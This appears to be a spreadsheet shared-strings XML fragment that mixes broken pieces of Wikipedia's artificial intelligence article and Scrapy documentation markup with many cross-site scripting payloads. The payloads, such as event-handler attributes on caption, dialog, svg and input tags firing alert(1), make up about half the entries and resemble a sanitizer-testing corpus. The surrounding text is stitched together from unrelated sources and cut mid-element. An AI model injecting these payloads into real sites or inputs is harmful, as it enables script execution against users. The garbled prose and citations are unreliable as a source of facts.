  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;ArXiv, E. T. (26 October 2015). Why Self-Driving Cars Must Be Programmed to Kill. Retrieved 17 November 2017, from &lt;a rel="nofollow" class="external free" href="https://www.technologyreview.com/s/542626/why-self-driving-cars-must-be-programmed-to-kill/"&gt;https://www.technologyreview.com/s/542626/why-self-driving-cars-must-be-programmed-to-kill/ &lt;/a&gt;&lt;sup class="noprint Inline-Template"&gt;&lt;span style="white-space: nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Link_rot" title="Wikipedia:Link rot"&gt;&lt;span title="&amp;#160;Dead link since October 2019"&gt;permanent dead link </t>
  </si>
  <si>
    <t>&lt;caption onpointerleave=alert(1)&gt;XSS&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;var id=x tabindex=1 onactivate=alert(1)&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;"Programming safety into self-driving cars". National Science Foundation. N.p., 2 February 2015. 24 October 2016. </t>
  </si>
  <si>
    <t>&lt;link onkeyup="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;p style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;track onbeforecopy="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;meta id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;dialog oncontextmenu="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onkeydown="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Norbert_Wiener" title="Norbert Wiener"&gt;Norbert Wiener &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/shadow&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style data-mw-deduplicate="TemplateStyles:r886047268"&gt;.mw-parser-output .refbegin{font-size:90%;margin-bottom:0.5em}.mw-parser-output .refbegin-hanging-indents&gt;ul{list-style-type:none;margin-left:0}.mw-parser-output .refbegin-hanging-indents&gt;ul&gt;li,.mw-parser-output .refbegin-hanging-indents&gt;dl&gt;dd{margin-left:0;padding-left:3.2em;text-indent:-3.2em;list-style:none}.mw-parser-output .refbegin-100{font-size:100%} &lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;fieldset ondrop=alert(1) contenteditable&gt;drop here&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;header oncopy="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;object id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/object&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/CMA-ES" title="CMA-ES"&gt;Covariance Matrix Adaptation Evolution Strategy (CMA-ES) &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Machine_learning-117"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Machine_learning_117-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Machine_learning_117-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;nav style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>A few of the people who make some form of the argument:</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Explanation_based_learning" class="mw-redirect" title="Explanation based learning"&gt;Explanation based learning &lt;/a&gt;, relevance based learning, &lt;a href="/wiki/Inductive_logic_programming" title="Inductive logic programming"&gt;inductive logic programming &lt;/a&gt;, &lt;a href="/wiki/Case_based_reasoning" class="mw-redirect" title="Case based reasoning"&gt;case based reasoning &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-139"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-139"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;span style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;421–424, 486–489 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/media-pipeline.html"&gt;Downloading and processing files and images&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;i&gt;See also: &lt;a href="/wiki/Artificial_intelligence_in_fiction#Logic_machines" title="Artificial intelligence in fiction"&gt;Logic machines in fiction &lt;/a&gt; and &lt;a href="/wiki/List_of_fictional_computers" title="List of fictional computers"&gt;List of fictional computers &lt;/a&gt; &lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Scientific_essentialism" title="Scientific essentialism"&gt;Scientific essentialism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Neural networks were inspired by the architecture of neurons in the human brain. A simple "neuron" &lt;i&gt;N &lt;/i&gt; accepts input from other neurons, each of which, when activated (or "fired"), cast a weighted "vote" for or against whether neuron &lt;i&gt;N &lt;/i&gt; should itself activate. Learning requires an algorithm to adjust these weights based on the training data; one simple algorithm (dubbed "&lt;a href="/wiki/Hebbian_learning" class="mw-redirect" title="Hebbian learning"&gt;fire together, wire together &lt;/a&gt;") is to increase the weight between two connected neurons when the activation of one triggers the successful activation of another. The neural network forms "concepts" that are distributed among a subnetwork of shared&lt;sup id="cite_ref-232" class="reference"&gt;&lt;a href="#cite_note-232"&gt;&amp;#91;j&amp;#93; &lt;/a&gt; &lt;/sup&gt; neurons that tend to fire together; a concept meaning "leg" might be coupled with a subnetwork meaning "foot" that includes the sound for "foot". Neurons have a continuous spectrum of activation; in addition, neurons can process inputs in a nonlinear way rather than weighing straightforward votes. Modern neural networks can learn both continuous functions and, surprisingly, digital logical operations. Neural networks' early successes included predicting the stock market and (in 1995) a mostly self-driving car.&lt;sup id="cite_ref-233" class="reference"&gt;&lt;a href="#cite_note-233"&gt;&amp;#91;k&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-FOOTNOTEDomingos2015Chapter_4_234-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015Chapter_4-234"&gt;&amp;#91;223&amp;#93; &lt;/a&gt; &lt;/sup&gt; In the 2010s, advances in neural networks using deep learning thrust AI into widespread public consciousness and contributed to an enormous upshift in corporate AI spending; for example, AI-related &lt;a href="/wiki/Mergers_and_acquisitions" title="Mergers and acquisitions"&gt;M&amp;amp;A &lt;/a&gt; in 2017 was over 25 times as large as in 2015.&lt;sup id="cite_ref-235" class="reference"&gt;&lt;a href="#cite_note-235"&gt;&amp;#91;224&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-236" class="reference"&gt;&lt;a href="#cite_note-236"&gt;&amp;#91;225&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;marquee oncontextmenu="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;map onmousedown="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;sup onmouseenter="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;p class="caption"&gt;&lt;span class="caption-text"&gt;Extending Scrapy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Economics"&gt;Economics </t>
  </si>
  <si>
    <t>&lt;datalist oncut="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;head id=x tabindex=1 onfocus=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;embed id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;ul oncontextmenu="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;span&gt;Variants </t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;i&gt;The &lt;a href="/wiki/AI_effect" title="AI effect"&gt;AI effect &lt;/a&gt; &lt;/i&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_in_2000s-13"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-AI_in_2000s_13-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-AI_in_2000s_13-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-AI_in_2000s_13-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Emergentism" title="Emergentism"&gt;Emergentism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpointermove=alert(1)&gt;XSS&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;noembed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;span onclick="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Report bugs with Scrapy in our &lt;a class="reference external" href="https://github.com/scrapy/scrapy/issues"&gt;issue tracker&lt;/a&gt;.&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;del onkeyup="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cognitive_psychology" title="Cognitive psychology"&gt;Cognitive psychology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;center ondrop=alert(1) contenteditable&gt;drop here&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;output id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;iframe ondragover=alert(1) contenteditable&gt;drop here&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;th oncontextmenu="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Peripheral" title="Peripheral"&gt;Peripheral &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>Classifier performance:</t>
  </si>
  <si>
    <t>&lt;image oncontextmenu="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;small onmouseout="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Artificial_consciousness" title="Artificial consciousness"&gt;Artificial consciousness &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;br ondragover=alert(1) contenteditable&gt;drop here&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;thead onbeforecopy="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;West, Darrell M. "Moving forward: Self-driving vehicles in China, Europe, Japan, Korea, and the United States". Center for Technology Innovation at Brookings. N.p., September 2016. 12 November 2016. </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="contributing.html"&gt;&lt;span class="doc"&gt;Contributing to Scrapy</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;tt onblur=alert(1) tabindex=1 id=x&gt;&lt;/tt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;article onmouseenter="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;aside onpointermove=alert(1)&gt;XSS&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;output onpointerup=alert(1)&gt;XSS&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;script onbeforecopy="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;noscript draggable="true" ondragleave="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;th onpointerout=alert(1)&gt;XSS&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onmouseleave="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;td onmouseup="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Further information: &lt;a href="/wiki/Progress_in_artificial_intelligence" title="Progress in artificial intelligence"&gt;Progress in artificial intelligence &lt;/a&gt; and &lt;a href="/wiki/Competitions_and_prizes_in_artificial_intelligence" title="Competitions and prizes in artificial intelligence"&gt;Competitions and prizes in artificial intelligence &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;head onpointerdown=alert(1)&gt;XSS&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpointerout=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;span onmouseup="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;&lt;li&gt;&lt;cite id="CITEREFHutter2005" class="citation book"&gt;&lt;a href="/wiki/Marcus_Hutter" title="Marcus Hutter"&gt;Hutter, Marcus &lt;/a&gt; (2005). &lt;a href="/wiki/AIXI" title="AIXI"&gt;&lt;i&gt;Universal Artificial Intelligence &lt;/i&gt; &lt;/a&gt;. Berlin: Springer. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-3-540-22139-5" title="Special:BookSources/978-3-540-22139-5"&gt;&lt;bdi&gt;978-3-540-22139-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Universal+Artificial+Intelligence&amp;amp;rft.place=Berlin&amp;amp;rft.pub=Springer&amp;amp;rft.date=2005&amp;amp;rft.isbn=978-3-540-22139-5&amp;amp;rft.aulast=Hutter&amp;amp;rft.aufirst=Marcus&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHernandez-OralloDowe2010" class="citation journal"&gt;Hernandez-Orallo, J.; Dowe, D. L. (2010). "Measuring Universal Intelligence: Towards an Anytime Intelligence Test". &lt;i&gt;Artificial Intelligence &lt;/i&gt;. &lt;b&gt;174 &lt;/b&gt; (18): 1508–1539. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.295.9079"&gt;10.1.1.295.9079 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;hgroup draggable="true" ondragend="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;listing onmouseleave="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;progress style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;&lt;li&gt;&lt;cite id="CITEREFCrevier1993" class="citation"&gt;&lt;a href="/wiki/Daniel_Crevier" title="Daniel Crevier"&gt;Crevier, Daniel &lt;/a&gt; (1993), &lt;i&gt;AI: The Tumultuous Search for Artificial Intelligence &lt;/i&gt;, New York, NY: BasicBooks, &lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt;&lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/0-465-02997-3" title="Special:BookSources/0-465-02997-3"&gt;0-465-02997-3 &lt;/a&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=AI%3A+The+Tumultuous+Search+for+Artificial+Intelligence&amp;amp;rft.place=New+York%2C+NY&amp;amp;rft.pub=BasicBooks&amp;amp;rft.date=1993&amp;amp;rft.aulast=Crevier&amp;amp;rft.aufirst=Daniel&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Robot_rights" class="mw-redirect" title="Robot rights"&gt;Robot rights &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;listing onclick="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;cite id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_funding_in_the_60s-38"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-AI_funding_in_the_60s_38-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;figure ondrop=alert(1) contenteditable&gt;drop here&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;map draggable="true" ondragstart="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;tt onmouseout="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;link ondblclick="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;legend style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;mark onmousemove="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;dd id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;dl onbeforepaste="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onkeydown="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robot_navigation" title="Robot navigation"&gt;Robot navigation &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;script id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;td ondragover=alert(1) contenteditable&gt;drop here&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;embed onmouseover="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;noembed id=x tabindex=1 onfocus=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Banks use artificial intelligence systems today to organize operations, maintain book-keeping, invest in stocks, and manage properties. AI can react to changes overnight or when business is not taking place.&lt;sup id="cite_ref-Eleanor_315-0" class="reference"&gt;&lt;a href="#cite_note-Eleanor-315"&gt;&amp;#91;304&amp;#93; &lt;/a&gt; &lt;/sup&gt; In August 2001, robots beat humans in a simulated &lt;a href="/wiki/Stock_trader" title="Stock trader"&gt;financial trading &lt;/a&gt; competition.&lt;sup id="cite_ref-316" class="reference"&gt;&lt;a href="#cite_note-316"&gt;&amp;#91;305&amp;#93; &lt;/a&gt; &lt;/sup&gt; AI has also reduced fraud and financial crimes by &lt;a href="/wiki/Statistical_software" class="mw-redirect" title="Statistical software"&gt;monitoring &lt;/a&gt; &lt;a href="/wiki/Behavioral_pattern" title="Behavioral pattern"&gt;behavioral patterns &lt;/a&gt; of users for any abnormal changes or anomalies.&lt;sup id="cite_ref-fsroundtable.org_317-0" class="reference"&gt;&lt;a href="#cite_note-fsroundtable.org-317"&gt;&amp;#91;306&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-318" class="reference"&gt;&lt;a href="#cite_note-318"&gt;&amp;#91;307&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-319" class="reference"&gt;&lt;a href="#cite_note-319"&gt;&amp;#91;308&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;840–857, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/datalist&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;center draggable="true" ondragenter="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;443–460 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;link id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onmouseout="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;svg oncopy="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpointermove=alert(1)&gt;XSS&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;source onpointerout=alert(1)&gt;XSS&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onpointerover=alert(1)&gt;XSS&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;cite id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/cite&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;summary id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/summary&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup draggable="true" ondrag="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;input onbeforecopy=alert(1) value="XSS" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 10.1–2, 22 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Intelligence_explosion" class="mw-redirect" title="Intelligence explosion"&gt;Intelligence explosion &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=the+Guardian&amp;amp;rft.atitle=%27It%27s+able+to+create+knowledge+itself%27%3A+Google+unveils+AI+that+learns+on+its+own&amp;amp;rft.date=2017-10-18&amp;amp;rft.aulast=Sample&amp;amp;rft.aufirst=Ian&amp;amp;rft_id=https%3A%2F%2Fwww.theguardian.com%2Fscience%2F2017%2Foct%2F18%2Fits-able-to-create-knowledge-itself-google-unveils-ai-learns-all-on-its-own&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=55" title="Edit section: Autonomous weapons"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Compiler_construction" class="mw-redirect" title="Compiler construction"&gt;Compiler &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=13" title="Edit section: General intelligence"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;address draggable="true" ondrag="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;rp onpointerover=alert(1)&gt;XSS&lt;/rp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          SphinxRtdTheme.Navigation.enable(true);</t>
  </si>
  <si>
    <t>&lt;multicol onpointerover=alert(1)&gt;XSS&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;option onmouseenter="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFNilsson1998" class="citation book"&gt;&lt;a href="/wiki/Nils_Nilsson_(researcher)" class="mw-redirect" title="Nils Nilsson (researcher)"&gt;Nilsson, Nils &lt;/a&gt; (1998). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/artificialintell0000nils"&gt;&lt;i&gt;Artificial Intelligence: A New Synthesis &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Existential_risk_from_artificial_intelligence" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/Existential_risk_from_artificial_general_intelligence" title="Existential risk from artificial general intelligence"&gt;Existential risk &lt;/a&gt; from &lt;a class="mw-selflink selflink"&gt;artificial intelligence &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Concepts &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;svg id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/settings.html"&gt;&lt;span class="doc"&gt;Settings</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;del id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
